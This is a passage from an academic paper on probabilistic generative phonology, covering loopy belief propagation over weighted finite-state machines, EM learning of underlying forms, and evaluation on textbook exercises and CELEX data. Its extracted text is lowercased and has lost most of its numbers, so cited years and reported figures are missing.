underlying phonemes are common in the lexicon. a -gram model would model the “underlying phonotactics” of morphs, though phonological processes would still be needed at morph boundaries. such models are the probabilistic analogue of morpheme struc- ture constraints. we could further generalize from mφ(m) to mφ(m | a), to allow the shape of the morph m to be influenced by a’s content. for example, mφ(m | a) for english might describe how nouns tend to have underlying stress on the first syllable; similarly, mφ(m | a) for arabic might capture the fact that underlying stems tend to consist of consonants; and across languages, mφ(m | a) would prefer affixes to be short. note that we will always learn a language’s mφ jointly with its actual lexicon m. loosely speak- ing, the parameter vector φ is found from easily reconstructed urs in m; then mφ serves as a prior that can help us reconstruct more difficult urs. . prior over the parameters for φ, which is a scalar under our -gram model, our prior is uniform over ( , ]. we place a spher- ical gaussian prior on the vector θ, with mean ~ and a variance σ tuned by coarse grid search on dev data (see captions of figures – ). the gaussian favors phonologies that are sim- ple in the sense that they have few strongly weighted features. a grammar that refers once to the natural class of voiced consonants (section ), which captures a generalization, is preferred to an equally descriptive grammar that refers separately to several specific voiced consonants. if it is hard to tell whether a change applies to round or back vowels (because these properties are strongly cor- related in the training data), then the prior resists grammars that make an arbitrary choice. it prefers to “spread the blame” by giving half the weight to each feature. the change is still probable for round back vowels, and moderately probable for other vowels that are either round or back. inference we are given a training set of surface word forms s that realize known abstract words ~a. we aim to reconstruct the underlying morphs m and words u, and predict new surface word forms s. . a bayesian network for fixed θ and φ, this task can be regarded as marginal inference in a bayesian network (pearl, ). figure displays part of a network that en- codes the modeling assumptions of section . the nodes at layers , , and of this network repre- sent string-valued random variables in m, u, and s respectively. each variable’s distribution is con- ditioned on the values of its parents, if any. in particular, layer represents the unknown m(a) for various a. notice that each m(a) is softly constrained by the prior mφ, and also by the fact that it must help produce various observed surface words via sθ. each underlying word u at level is a concate- nation of its underlying morphs m(ai) at level . thus, the topology at levels – is given by super- vision. we would have to learn this topology if the word’s morphemes ai were not known. our approach captures the unbounded genera- tive capacity of language. in contrast to dreyer and eisner ( ) (see section ), we have defined a directed graphical model. hence new unob- served descendants can be added without chang- ing the posterior distribution over the existing vari- ables. so our finite network can be viewed as a subgraph of an infinite graph. that is, we make no closed-vocabulary assumption, but implicitly in- clude (and predict the surface forms of) any un- observed words that could result from combining morphemes, even morphemes not in our dataset. while the present paper focuses on word types, we could extend the model to consider tokens as well. in figure , each phonological surface type at layer could be observed to generate or more noisy phonetic tokens at layer , in contexts that call for the morphemes expressed by that type. . loopy belief propagation the top two layers of figure include a long undirected cycle (involving all nodes and all edges shown). on such “loopy” graphical models, exact inference is in general uncomputable when the random variables are string-valued. however, dreyer and eisner ( ) showed how to substi- tute a popular approximate joint inference method, loopy belief propagation (murphy et al., ). qualitatively, what does this do on figure ? let u denote the leftmost layer- node. midway through loopy bp, u is not yet sure of its value, but is receiving suggestions from its neighbors. the stem ur immediately above u would like u to start with something like /rizajgn#/. meanwhile, the word sr immediately below u encourages u to be any ur that would have a high probability (under sθ) of surfacing as [rezign#eis@n]. so u tries to meet both requirements, guessing that its value might be something like /rizajgn#eis@n/ (the product of this string’s scores under the two mes- sages to u is relatively high). now, for u to have produced something like /rizajgn#eis@n/ by stem- suffix concatenation, the suffix’s ur must have been something like /eis@n/. u sends a message saying so to the third node in layer . this induces that node (the suffix ur) to inform the rightmost layer- node that it probably ends in /#eis@n/ as well—and so forth, iterating until convergence. formally, the loopy bp algorithm iteratively updates messages and beliefs. each is a func- tion that scores possible strings (or string tuples). dreyer and eisner ( )’s key insight is that these messages and beliefs can be represented using weighted finite-state machines (wfsms), and fur- thermore, loopy bp can compute all of its updates using standard polytime finite-state constructions. . discussion: the finite-state requirement the above results hold when the “factors” that de- fine the graphical model are themselves expressed loopy bp actually passes messages on a factor graph de- rived from figure . however, in this informal paragraph we will speak as if it were passing messages on figure directly. because that stem ur thinks its own value is something like /rizajgn/—based on the messages that it is currently re- ceiving from related forms such as /rizajgn#z/, and from mφ. as wfsms. this is true in our model. the fac- tors of section . correspond to the conditional distributions mφ, u, and sθ that respectively se- lect values for nodes at layers , , and given the values at their parents. as section models these, for any φ and θ, we can represent mφ as a -tape wfsm (acceptor), u as a multi-tape wfsm, and sθ as a -tape wfsm (transducer). any other wfsms could be substituted. we are on rather firm ground in restricting to finite-state (regular) models of sθ. the apparent regularity of natural-language phonology was first observed by johnson ( ), so computational phonology has generally preferred grammar formalisms that compile into (unweighted) finite-state machines, whether the formalism is based on rewrite rules (kaplan and kay, ) or constraints (eisner, a; riggle, ). similarly, u could be any multi-tape finite-state relation, not just concatenation as assumed in sec- tion . this would allow our framework to handle templatic morphology (hulden, ), infixation, or circumfixation. although only regular factors are allowed in our graphical model, a loopy graphical model with multiple such factors can actually capture non- regular phenomena, for example by using auxil- iary variables (dreyer and eisner, , § . ). ap- proximate inference then proceeds by loopy bp on this model. in particular, reduplication is not reg- ular if unbounded, but we can adopt morphologi- cal doubling theory (inkelas and zoll, ) and model it by having u concatenate two copies of the same morph. during inference of urs, this morph exchanges messages with two substrings of the underlying word. mφ has a single state, with halt probability φ and the remaining probability − φ divided among self-loop arcs labeled with the phonemes in Σu. u must concatenate k morphs by copying all of tape , then tape , etc., to tape k + : this is easily done using k + states, and arcs of probability . sθ is constructed as in cotterell et al. ( ). in general, a u factor enforces u = u(m , . . . ,mk), so it is a degree-(k + ) factor, represented by a (k + )- tape wfsm connecting these variables (dreyer and eis- ner, ). if one’s finite-state library is limited to - tape wfsms, then one can simulate the u factor us- ing ( ) an auxiliary string variable π encoding the path through u, ( ) a unary factor weighting π according to u, ( ) a set of binary factors relating π to each of u,m , . . . ,mk. the standard case u = m # . . . #mk can be handled more easily. given factor u’s incoming mes- sages µ·→u , each being a -tape wfsm, compute its loopy bp outgoing messages µu→u = µm →u # · · ·#µmk→u and (e.g.) µu→m = range(µu→u ◦ ((µm →u # × �) Σ∗u (#µm →u # · · ·#µmk→u × �))). similarly, we can manipulate the graphical model structure to encode cyclic phonology—i.e., concatenating a word sr with a derivational affix ur and passing the result through sθ once again. an alternative is to encode this hierarchical struc- ture into the word ur u, by encoding level- and level- boundaries with different symbols. a sin- gle application of sθ can treat these boundaries differently: for example, by implementing cyclic phonology as a composition of two transductions. . loopy bp implementation details each loopy bp message to or from a random variable is a -tape wfsm (acceptor) that scores all possible values of that variable (given by the set m, u, or s: see section ). we initialized each message to the uniform distribution. we then updated the messages serially, alternating be- tween upward and downward sweeps through the bayesian network. after iterations we stopped and computed the final belief at each variable. a complication is that a popular affix such as /z/ (in layer ) receives messages from hundreds of words that realize that affix. loopy bp obtains that affix’s belief and outgoing messages by intersect- ing all these wfsms—which can lead to astro- nomically large results and runtimes. we address this for now with a simple pruning approximation where at each variable m, we dynamically restrict to a finite support set of plausible values for m. we take this to be the union of the -best lists of all messages sent to m. we modify those mes- sages so that strings in m’s support set have un- changed weight, but all other strings have weight . as a result, m’s outgoing messages and belief are also confined to its support set. note that the support set is not hand-specified, but determined automatically by taking the best hypotheses under the probability model. improved approaches with no pruning are pos- sible. after submitting this paper, we devel- oped a penalized expectation propagation method (cotterell and eisner, ). it approximates the messages using log-linear functions (based on variable-order n-gram features) whose support is the entire space Σ∗ . we also developed a dual this is standard—although the uniform distribution over the space of strings is actually an improper distribution. it is expressed by a single-state wfsm whose arcs have weight . in general, we should update this support set dynami- cally as inference and learning improve the messages. but in our present experiments, that appears unnecessary, since the initial support set always appears to contain the “correct” ur. decomposition method (peng et al., ), which if it converges, exactly recovers the single most probable explanation of the data given φ and θ. parameter learning we employ map-em as the learning algorithm. the e-step is approximated by the loopy bp algo- rithm of section . the m-step takes the resulting beliefs, together with the prior of section . , and uses them to reestimate the parameters θ and φ. if we knew the true ur uk for each observed word type sk, we would just do supervised training of θ, using l-bfgs (liu and nocedal, ) to locally maximize θ’s posterior log-probability ( ∑ k log sθ(sk | uk)) + log pprior(θ) cotterell et al. ( ) give the natural dynamic programming algorithm to compute each sum- mand and its gradient w.r.t. θ. the gradient is the difference between observed and expected feature vectors of the contextual edits (section . ), aver- aged over edit contexts in proportion to how many times those contexts were likely encountered. the latent alignment makes the objective non-concave. in our em setting, uk is not known. so our m- step replaces log sθ(sk | uk) with its expectation,∑ uk bk(uk) log sθ(sk | uk), where bk is the nor- malized belief about uk computed by the previ- ous e-step. since bk and sθ are both represented by wfsms (with and tapes respectively), it is possible to compute this quantity and its gradient exactly, using finite-state composition in a second- order expectation semiring (li and eisner, ). for speed, however, we currently prune bk back to the -best values of uk. this lets us use a sim- pler and faster approach: a weighted average over runs of the cotterell et al. ( ) algorithm. our asymptotic runtime benefits from the fact that our graphical model is directed (so our objec- tive does not have to contrast with all other values of uk) and the fact that sθ is locally normalized (so our objective does not have to contrast with all other values of sk for each uk). in practice we are far faster than dreyer and eisner ( ). we initialized the parameter vector θ to ~ , ex- cept for setting the weight of the copy feature (section ) such that the probability of a copy edit is . in every context other than end-of-string. this encourages urs to resemble their srs. that is, a lexicon of morphs together with contextual edit sequences that will produce the observed word srs. bigram(strident,strident) adjacent surface stridents bigram(�,uvular) surface uvular edit([s],[z]) /s/ became [z] edit(coronal,labial) coronal became labial edit(�, phoneme) phoneme was inserted edit(consonant,�) consonant was deleted table : examples of markedness and faithfulness features that fire in our model. they have a natural interpretation as optimality-theoretic constraints. � denotes the empty string. the natural classes were adapted from (riggle, ). to reestimate φ, the m-step does not need to use l-bfgs, for section . ’s simple model of mφ and uniform prior over φ ∈ ( , ]. it simply sets φ = /(` + ) where ` is the average expected length of a ur according to the previous e-step. the expected length of each uk is extracted from the wfsm for the belief bk, using dynamic pro- gramming (li and eisner, ). we initialized φ to . ; experiments on development data sug- gested that the choice of initializer had little effect. features of the phonology model our stochastic edit process sθ(s | u) assigns a probability to each possible u-to-s edit sequence. this edit sequence corresponds to a character-wise alignment of u to s. our features for modeling the contextual probability of each edit are loosely inspired by constraints from harmonic grammar and optimality theory (smolensky and legendre, ). such constraints similarly evaluate a u-to- s alignment (or “correspondence”). they are tra- ditionally divided into markedness constraints that encourage a well-formed s, and faithfulness con- straints that encourage phonemes of s to resemble their aligned phonemes in u. our edit faithfulness features evaluate an edit’s (input, output) phoneme pair. our bigram markedness features evaluate an edit that emits a new phoneme of s. they evaluate the surface bi- gram it forms with the previous output phoneme. table shows example features. notice that these features back off to various natural classes of phonemes (clements and hume, ). these features of an edit need to examine at most ( , , ) phonemes of (left input, right input, left output) context respectively (see figure ). so the pfst that implements sθ should be able to use what cotterell et al. ( ) calls a ( , , ) topol- ogy. however, we actually used a ( , , ) topology, at beginning-of-string, the previous “phoneme” is the special symbol bos. for the halt edit at end-of-string, which copies the symbol eos, the new “phoneme” is eos. to allow features that also look at the “upcoming” input phoneme that immediately follows the edit’s input (/@/ in figure ). specifically, for each nat- ural class, we also included contextual versions of each edit or bigram feature, which fired only if the “upcoming” input phoneme fell in that natu- ral class. contextual bigram features are our ap- proximation to surface trigram features that look at the edit’s output phoneme together with the pre- vious and next output phonemes. (a pfst can- not condition its edit probabilities on the next out- put phoneme because that has not been generated yet—see section . —so we are using the upcom- ing input phoneme as a proxy.) contextual edit features were cheap to add once we were using a ( , , ) topology, and in fact they turned out to be helpful for capturing processes such as catalan’s deletion of the underlyingly final consonant. finally, we included a copy feature that fires on any edit where surface and underlying phonemes are exactly equal. (this feature resem- bles optimality theory’s ident-io constraint, and ends up getting the strongest weight.) in total, our model has roughly , binary features. many improvements to this basic feature set would be possible in future. we cannot currently express implications such as “adjacent obstruents must also agree in voicing,” “a vowel that surfaces must preserve its height,” or “successive vowels must also agree in height.” we also have not yet designed features that are sensitive to surface prosodic boundaries or underlying morph bound- aries. (prosodic structure and autosegmental tiers are absent from our current representations, and we currently simplify the stochastic edit process’s feature set by having sθ erase the # morph bound- aries before applying that process.) our standard prior over θ (section . ) resists overfitting in a generic way, by favoring phonolo- gies that are “simple to describe.” linguistic im- provements are possible here as well. the prior should arguably discourage positive weights more than negative ones, since our features detect con- straint violations that ordinarily reduce probabil- ity. it should also be adjusted to mitigate the cur- rent structural bias against deletion edits, which arises because the single deletion possible in a context must compete on equal footing with |Σs| insertions and |Σs|− substitutions. more ambi- tiously, a linguistically plausible prior should pre- fer phonologies that are conservative (s ≈ u) and have low conditional entropies h(s | u),h(u | s) to facilitate communication. experimental design we objectively evaluate our learner on its ability to predict held-out surface forms. this blind testing differs from traditional practice by linguists, who evaluate a manual or automatic analysis (= urs + phonology) on whether it describes the full dataset in a “natural” way that captures “appropriate” gen- eralizations. we avoid such theory-internal evalu- ation by simply quantifying whether the learner’s analysis does generalize (eisner, ). to avoid tailoring to our training/test data, we developed our method, code, features, and hy- perparameters using only two development lan- guages, english and german. thus, our learner was not engineered to do well on the other lan- guages below: the graphs below show its first at- tempt to learn those languages. we do also eval- uate our learners on english and german, using separate training/test data. we provide all our data (including cita- tions, development data, training-test splits, and natural classes) at http://hubal.cs.jhu.edu/ tacl /, along with brief sketches of the phonological phenomena in the datasets, the “gold” stem urs we assumed for evaluation, and our learner’s predictions and error patterns. . evaluation methodology given a probability distribution p over surface word types of a language, we sample a training set of n types without replacement. this simulates reading text until we have seen n distinct types. for each of these frequent words, we observe the sr s and the morpheme sequence ~a. after training our model, we evaluate its beliefs b about the srs s on a disjoint set of test words whose ~a are observed. to improve interpretabil- ity of the results, we limit the test words to those whose morphemes have all appeared at least once in the training set. (any method would presumably get other words badly wrong, just as it would get the training words right.) to evaluate our belief b about the sr of a test word (~a,s∗), we use three measures for which “smaller is better.” first, - loss asks whether s∗ = argmaxs b(s). this could be compared with non-probabilistic predictors. second, the surprisal − log b(s∗) is low if the model finds it plausible http://hubal.cs.jhu.edu/tacl / http://hubal.cs.jhu.edu/tacl / maori catalan tangale indon. . . . . . . cross entropy (bits) maori catalan tangale indon. . . . . . . . expected edit distance maori catalan tangale indon. . . . . . . -best error rate noisy concatenation our method oracle figure : results on the small phonological exercise datasets (≈ word types). smaller numbers are better. preliminary tests suggested that the variance of the prior (section . ) did not strongly affect the results, so we took σ = for all experiments. that s∗ realizes ~a. if so, this holds out promise for future work on analyzing or learning from unan- notated tokens of s∗. third, we evaluate the whole distribution b in terms of ∑ s b(s)l(s ∗,s) where l is unweighted levenshtein distance. we take the average of each measure over test words, weighting those words according to p. this yields our three reported metrics: -best error rate, cross-entropy, and expected edit distance. each metric is the expected value of some mea- sure on a random test token. these metrics are actually random variables, since they depend on the randomly sampled train- ing set and the resulting test distribution. we re- port the expectations of these random variables by running many training-test splits (see section . ). . datasets to test discovery of interesting patterns from lim- ited data, we ran our learner on “exercises” drawn from phonology textbooks ( english nouns, maori verbs, catalan adjectives, tangale nouns, indonesian nouns), exhibiting a diverse range of phenomena. in each case we took p to be the uniform distribution over the pro- vided word types. we took n to be one less than the number of provided types. so to report our expected metrics, we ran all n + experiments where we trained jointly on n forms and tested on the remaining form. this is close to linguists’ practice of fitting an analysis on the entire dataset, yet it is a fair test. to test on larger, naturally occurring datasets, we ran our learner on subsets of the celex database (baayen et al., ), which provides surface phonological forms and token counts for german, dutch, and english words. for each language, we constructed a coherent subcorpus of nouns and verbs, focusing on inflections with common phonological phenomena. these turned out to involve mainly voicing: final obstru- ent devoicing (german nd-person present indica- tive verbs, german nominative singular nouns, dutch infinitive verbs, dutch singular nouns) and voicing assimilation (english past tense verbs, en- glish plural nouns). we were restricted to rela- tively simple phenomena because our current rep- resentations are simple segmental strings that lack prosodic and autosegmental structure. in future we plan to consider stress, vowel harmony, and templatic morphology. we constructed the distribution p in proportion to celex’s token counts. in each language, we trained on n = , , , or forms sam- pled from p. to estimate the expectation of each metric over all training sets of size n, we report the sample mean and bootstrap standard error over random training sets of size n. except in indonesian, every word happens to consist of at most two morphemes (one stem plus one possibly empty suffix). in all experiments, we take the phonological inventories Σu and Σs to be given as the set of all surface phonemes observed in training ∪ test. . comparison systems there do not appear to be previous systems that perform our generalization task. therefore, we compared our own system against variants. we performed an ablation study to determine whether the learned phonology was helpful. we substituted a simplified phonology model where sθ(s | u) just decays exponentially with the edit distance between s and u; the decay rate was learned by em as usual. that is, this model uses only the copy feature of section . this baseline system treats phonology as “noisy concatenation” of learned urs, not trying to model its regularity. . . . . . . - be st e rr or ra te german . . . . . . dutch . . . . . . . . english noisy concatenation our method oracle . . . . . . . cr os s- en tr op y (b its ) . . . . . . . . . . . . . . . . . . . . . ex pe ct ed e di t d is ta nc e . . . . . . . . . . . . . . . . . figure : results on the celex datasets ( word types) at different training set sizes n. the larger training sets were supersets of the smaller ones, obtained by continuing to sample with replacement from p. for each training set, the unconnected points evaluate all words /∈ training whose morphemes ∈ training. meanwhile, the connected points permit comparison across the values of n, by evaluating only on a common test set found by intersecting the unconnected test sets. each point estimates the metric’s expectation over all ways of sampling the training sets; specifically, we plot the sample mean from such runs, with error bars showing a bootstrap estimate of the standard error of the mean. non-overlapping error bars at a given n always happen to imply that the difference in the two methods’ sample means is too extreme to be likely to have arisen by chance (paired permutation test, p < . ). each time we evaluated some training-test split on some metric, we first tuned σ (section . ) by a coarse grid search where we trained on the first % of the training set and evaluated on the remaining %. we considered an additional ablation study to determine whether the learned urs were helpful. however, we did not come up with a plausible heuristic for identifying urs in some simpler way. thus, instead we asked whether the learned urs were as good as hand-constructed urs. our “ora- cle” system was allowed to observe gold-standard urs for stems instead of inferring them. this system is still fallible: it must still infer the af- fix urs by belief propagation, and it must still use map-em to estimate a phonology within our current model family sθ. even with supervision, this family will still struggle to model many types of phonology, e.g., ablaut patterns (in germanic strong verbs) and many stress-related phenomena. . results we graph our results in figures and . when given enough evidence, our method works quite well across the datasets. for – % of held-out words on the celex languages (when n = ), phon. exercises celex maori . german . catalan . dutch . tangale . english . indonesian table : percent of training words, weighted by the distribu- tion p, whose -best recovered ur (including the boundary #) exactly matches the manual “gold” analysis. results are av- erages over all runs (with n = for the celex datasets). and – % on the phonological exercises, our method’s top pick is the correct surface form. fur- ther, the other metrics show that it places most of its probability mass on that form, and the rest on highly similar forms. notably, our method’s pre- dictions are nearly as good as if gold stem urs had been supplied (the “oracle” condition). indeed, it does tend to recover those gold urs (table ). yet there are some residual errors in predict- ing the srs. our phonological learner cannot cross-entropy < bit means that the correct form has probability > / on average (using geometric mean). perfectly learn the ur-to-sr mapping even from many well-supervised pairs (the oracle condition). in the celex and tangale datasets, this is partly due to irregularity in the language itself. however, error analysis suggests we also miss some gener- alizations due to the imperfections of our current sθ model (as discussed in sections . and ). when given less evidence, our method’s perfor- mance is more sensitive to the training sample and is worse on average. this is expected: e.g., a stem’s final consonant cannot be reconstructed if it was devoiced (german) or deleted (maori) in all the training srs. however, a contributing factor may be the increased error rate of the phonolog- ical learner, visible even with oracle data. thus, we suspect that a sθ model with better gener- alization would improve our results at all train- ing sizes. note that harming sθ—allowing only “noisy concatenation”—clearly harms the method, proving the need for true phonological modeling. related work jarosz ( , § ) and tesar ( , chapters – ) review work on learning the phonology sθ. phonologists pioneered stochastic-gradient and passive-aggressive training methods—the gradual learning algorithm (boersma, ) and error- driven constraint demotion (tesar and smolen- sky, )—for structured prediction of the sur- face word s from the underlying word u. if s is not fully observed during training (we illustrate why in layer of figure ), then it can be imputed, a step known as robust interpretive parsing. recent papers consider our setting where u = m #m # · · · is not observed either. the contrast analysis method (tesar, ; merchant, ) in effect uses constraint propagation (dechter, ). that is, it serially eliminates variable values (de- scribing aspects of the urs or the constraint rank- ing) that are provably incompatible with the data. constraint propagation is an incomplete method that is not guaranteed to make all logical de- ductions. we use its probabilistic generalization, loopy belief propagation (dechter et al., )— which is still approximate but can deal with noise and stochastic irregularity. a further improvement is that we work with string-valued variables, repre- senting uncertainty using wfsms; this lets us rea- son about urs of unknown length and unknown alignment to the srs. (tesar and merchant in- stead used binary variables, one for each segmen- tal feature in each ur, requiring the simplifying assumption that the urs are known except for their segmental features. they assume that srs are annotated with morph boundaries and that the phonology only changes segmental features, never inserting or deleting segments.) on the other hand, tesar and merchant reason globally about the con- straint ranking, whereas in this paper, we only lo- cally improve the phonology—we use em, rather than the full bayesian approach that treats the pa- rameters ~θ as variables within bp. jarosz ( ) is closest to our work in that she uses em, just as we do, to maximize the probabil- ity of observed surface forms whose constituent morphemes (but not morphs) are known. her model is a probabilistic analogue of apoussidou ( ), who uses a latent-variable structured per- ceptron. a non-standard aspect of this model (de- fended by pater et al. ( )) is that a morpheme a can stochastically choose different morphs m(a) when it appears in different words. to obtain a sin- gle shared morph, one could penalize this distribu- tion’s entropy, driving it toward as learning pro- ceeds. such an approach—which builds on a sug- gestion by eisenstat ( , § . )—would loosely resemble dual decomposition (peng et al., ). unlike our bp approach, it would maximize rather than marginalize over possible morphs. our work has focused on scaling up inference. for the phonology s, the above papers learn the weights or rankings of just a few plausible con- straints (or jarosz ( ) learns a discrete distribu- tion over all ! = rankings of constraints), whereas we use sθ with roughly , con- straints (features) to enable learning of unknown languages. our s also allows exceptions. the above papers also consider only very restricted sets of morphs, either identifying a small set of plausible morphs or prohibiting segmental inser- tion/deletion. we use finite-state methods so that it is possible to consider the space Σ∗u of all strings. on the other hand, we are divided from pre- vious work by our inability to use an ot gram- mar (prince and smolensky, ), a stochastic ot grammar (boersma, ), or even a maxi- mum entropy grammar (goldwater and johnson, ; dreyer et al., ; eisenstat, ). the reason is that our bp method inverts the phono- logical mapping sθ to find possible word urs. she still assumes that word srs are annotated with mor- pheme boundaries, and that a small set of possible morphs is given. these assumptions are relaxed by eisenstat ( ). given a word sr s, we construct a wfsm (mes- sage) that scores every possible ur u ∈ Σ∗u —the score of u is sθ(s | u). to accomplish this step without approximation, our method needs sθ itself to be represented as a wfsm (section . ). (the wfsm for a maximum entropy grammar unfortu- nately does not compute sθ but only an unnormal- ized version. a different normalizing constant is needed for each u, akin to the “double intractabil- ity” problem in bayesian learning.) in the nlp community, elsner et al. ( ) re- sembles our work in many respects. like us, they recover a latent underlying lexicon (using the same simple prior mφ) and use em to learn a phonol- ogy (rather similar to our sθ, though less power- ful). unlike us, they do not assume annotation of the (abstract) morpheme sequence, but jointly learn a nonparametric bigram model to discover the morphemes. their evaluation is quite different, as their aim is actually to recover underlying words from phonemically transcribed child-directed en- glish utterances. however, nothing in their model distinguishes words from morphemes—indeed, sometimes they do find morphemes instead—so their model could be used in our task. for infer- ence, they invert the finite-state sθ like us to recon- struct a lattice of possible ur strings. however, they do this not within bp but within a block gibbs sampler that stochastically reanalyzes utterances one at a time. whereas our bp tries to find a con- sensus ur for each given morpheme type, their sampler posits morph tokens while trying to reuse frequent morph types, which are interpreted as the morphemes. with observed morphemes (our set- ting), this sampler would fail to mix. dreyer and eisner ( , ) like us used loopy bp and map-em to predict morphologi- cal srs. their paper was also able to ex- ploit raw text without morphological supervision. however, they directly modeled pairwise finite- state relationships among the surface word forms without using urs. their model is a joint distribu- tion over n variables: the word srs of a single in- flectional paradigm. since it requires a fixed n, it does not directly extend to derivational morphol- ogy: deriving new words would require adding new variables, which—for an undirected model like theirs—changes the partition function and re- elsner et al. ( ) used an sθ quite similar to ours though lacking bigram well-formedness features. elsner et al. ( ) simplified this for efficiency, disallowing segmen- tal deletion and no longer modeling the context of changes. quires retraining. by contrast, our trained directed model is a productive phonological system that can generate unboundedly many new words (see section . ). by analogy, n samples from a gaus- sian would be described with a directed model, and inferring the gaussian parameters predicts any number of future samples n + ,n + , . . .. bouchard-côté et al., in several papers from through , have used directed graphi- cal models over strings, like ours though without loops, to model diachronic sound change. some- times they use belief propagation for inference (hall and klein, ). their goal is to recover la- tent historical forms (conceptually, surface forms) rather than latent underlying forms. the results are evaluated against manual reconstructions. none of this work has segmented words into morphs, although dreyer et al. ( ) did seg- ment surface words into latent “regions.” creutz and lagus ( ) and goldsmith ( ) segment an unannotated collection of words into reusable morphs, but without modeling contextual sound change, i.e., phonology. conclusions and future work we have laid out a probabilistic model for gener- ative phonology. this lets us infer likely expla- nations of a collection of morphologically related surface words, in terms of underlying morphs and productive phonological changes. we do this by combining well-motivated algorithms for in- ference in graphical models and map estimation from incomplete data, using weighted finite-state machines to encode uncertainty. throughout our presentation, we were careful to point out various limitations of our setup. but in each case, we also outlined how future work could address these lim- itations within the framework we propose here. finally, we proposed a detailed scheme for quantitative evaluation of phonological learners. across different languages, on both small and larger datasets, our learner was able to predict held-out surface forms with low error rates. acknowledgments this material is based upon work supported by the national science foundation under grant no. , and by a fulbright grant to the first au- thor. we thank the anonymous reviewers and reut tsarfaty for useful discussion of presentation, ter- minology, and related work. references diana apoussidou. . on-line learning of under- lying forms. technical report roa- , rutgers optimality archive. r harald baayen, richard piepenbrock, and leon gu- likers. . the celex lexical database on cd- rom. juliette blevins. . a phonological and morpho- logical reanalysis of the maori passive. te reo, : – . paul boersma and bruce hayes. . empirical tests of the gradual learning algorithm. linguistic in- quiry, ( ): – . paul boersma. . how we learn variation, option- ality, and probability. in proc. of the institute of phonetic sciences of the university of amsterdam, volume , pages – . paul boersma. . how we learn variation, op- tionality, and probability. in functional phonology: formalizing the interactions between articulatory and perceptual drives, chapter . ph.d. disserta- tion, university of amsterdam. previously appeared in ifa proceedings ( ), pp. – . alexandre bouchard-côté, percy liang, thomas l. griffiths, and dan klein. . a probabilistic ap- proach to language change. in proc. of nips. alexandre bouchard-côté, david hall, thomas l. griffiths, and dan klein. . automated re- construction of ancient languages using probabilis- tic models of sound change. proceedings of the na- tional academy of sciences. noam chomsky and morris halle. . the sound pattern of english. harper and row. george n clements and elizabeth v hume. . the internal organization of speech sounds. in john goldsmith, editor, handbook of phonological the- ory. oxford university press, oxford. ryan cotterell and jason eisner. . penalized expectation propagation for graphical models over strings. in proceedings of naacl-hlt, pages – , denver, june. supplementary material ( pages) also available. ryan cotterell, nanyun peng, and jason eisner. . stochastic contextual edit distance and probabilistic fsts. in proc. of acl. mathias creutz and krista lagus. . inducing the morphological lexicon of a natural language from unannotated text. in proc. of the international and interdisciplinary conference on adaptive knowl- edge representation and reasoning (akrr ), vol- ume . rina dechter, bozhena bidyuk, robert mateescu, and emma rollon. . on the power of belief propagation: a constraint propagation per- spective. in rina dechter, hector geffner, and joseph y. halpern, editors, heuristics, probability and causality: a tribute to judea pearl. college publications. rina dechter. . constraint processing. morgan kaufmann. markus dreyer and jason eisner. . graphical models over multiple strings. in proc. of emnlp, pages – . markus dreyer and jason eisner. . discover- ing morphological paradigms from plain text us- ing a dirichlet process mixture model. in proc. of emnlp, emnlp ’ , pages – . markus dreyer, jason r. smith, and jason eisner. . latent-variable modeling of string transduc- tions with finite-state methods. in proc. of emnlp, pages – . markus dreyer. . a non-parametric model for the discovery of inflectional paradigms from plain text using graphical models over strings. ph.d. thesis, johns hopkins university, baltimore, md, april. sarah eisenstat. . learning underlying forms with maxent. master’s thesis, brown university, providence, ri. jason eisner. a. comprehension and compilation in optimality theory. in proc. of acl, pages – , philadelphia, july. jason eisner. b. discovering syntactic deep structure via bayesian statistics. cognitive science, ( ): – , may-june. jason eisner. . should linguists evaluate gram- mars or grammar learners? in preparation. micha elsner, sharon goldwater, and jacob eisenstein. . bootstrapping a unified model of lexical and phonetic acquisition. in proc. of acl, pages – . micha elsner, sharon goldwater, naomi feldman, and frank wood. . a joint learning model of word segmentation, lexical acquisition, and phonetic vari- ability. in proc. of emnlp, pages – . alexander m. fraser, marion weller, aoife cahill, and fabienne cap. . modeling inflection and word- formation in smt. in proc. of eacl, pages – . j. goldsmith. . an algorithm for the unsupervised learning of morphology. natural language engi- neering, ( ): – . sharon goldwater and mark johnson. . learning ot constraint rankings using a maximum entropy model. in proc. of the workshop on variation within optimality theory, pages – , stockholm uni- versity. david hall and dan klein. . finding cognate groups using phylogenies. in proc. of acl. bruce hayes and colin wilson. . a maximum en- tropy model of phonotactics and phonotactic learn- ing. linguistic inquiry, ( ): – . matt hohensee and emily m. bender. . getting more from morphology in multilingual dependency parsing. in proc. of naacl-hlt, pages – . mans hulden. . revisiting multi-tape automata for semitic morphological analysis and generation. in proc. of the eacl workshop on computa- tional approaches to semitic languages, pages – , march. sharon inkelas and cheryl zoll. . reduplication: doubling in morphology. number in cam- bridge studies in linguistics. cambridge university press. roman jakobson. . russian conjugation. word, : – . gaja jarosz. . richness of the base and prob- abilistic unsupervised learning in optimality theory. in proc. of the eighth meeting of the acl special in- terest group on computational phonology and mor- phology, pages – . gaja jarosz. . learning with hidden structure in optimality theory and harmonic grammar: beyond robust interpretive parsing. phonology, ( ): – . c. douglas johnson. . formal aspects of phono- logical description. mouton. rené kager. . optimality theory, volume . mit press. ronald m. kaplan and martin kay. . regu- lar models of phonological rule systems. compu- tational linguistics, ( ): – . michael j kenstowicz and charles w kisseberth. . generative phonology. academic press san diego. andrás kornai. . formal phonology. garland publishing, new york. zhifei li and jason eisner. . first- and second- order expectation semirings with applications to minimum-risk training on translation forests. in proc. of emnlp, pages – , singapore, august. dong c. liu and jorge nocedal. . on the limited memory bfgs method for large scale optimization. mathematical programming, ( - ): – . andrew mccallum, dayne freitag, and fernando c. n. pereira. . maximum entropy markov mod- els for information extraction and segmentation. in proc. of icml, pages – . navarré merchant. . discovering underlying forms: contrast pairs and ranking. ph.d. thesis, rutgers university. available on the rutgers opti- mality archive as roa- . kevin p. murphy, yair weiss, and michael i. jordan. . loopy belief propagation for approximate in- ference: an empirical study. in proc. of uai, pages – . joe pater, karen jesney, robert staubs, and brian smith. . learning probabilities over underly- ing representations. in proc. of the twelfth meet- ing of the special interest group on computational morphology and phonology, pages – . judea pearl. . probabilistic reasoning in in- telligent systems: networks of plausible inference. morgan kaufmann publishers inc., san francisco, ca, usa. nanyun peng, ryan cotterell, and jason eisner. . dual decomposition inference for graphical models over strings. in proceedings of emnlp, lisbon, september. to appear. janet pierrehumbert. . probabilistic phonology: discrimination and robustness. in probabilistic lin- guistics, pages – . mit press. alan prince and paul smolensky. . optimality theory: constraint interaction in generative gram- mar. wiley-blackwell. jason a. riggle. . generation, recognition, and learning in finite state optimality theory. 